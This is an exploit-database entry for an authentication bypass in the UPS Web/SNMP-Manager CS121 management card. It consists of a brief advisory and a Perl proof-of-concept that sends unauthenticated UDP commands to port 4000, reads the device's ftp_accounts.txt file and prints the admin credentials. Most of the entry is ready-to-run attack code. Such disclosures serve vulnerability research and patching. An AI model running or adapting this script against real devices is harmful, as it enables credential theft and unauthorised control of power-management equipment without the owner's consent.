UPS Web/SNMP-Manager CS121 - Authentication Bypass

Author: jkmac
type: remote
platform: multiple
port: 
date_added: 2014-05-15 
date_updated: 2016-01-07 
verified: 1 
codes: OSVDB-107117 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/67438/info

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service.

#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;

$socket = IO::Socket::INET->new( PeerPort  => 4000,
                                 PeerAddr  => $ARGV[0],
                                 Type      => SOCK_DGRAM,
                                 Proto     => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ;
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");

while($socket->recv($inline, MAXBYTES)) {
	 if($inline =~ /admin/ig) { print $inline; exit;  }
}

sleep(1);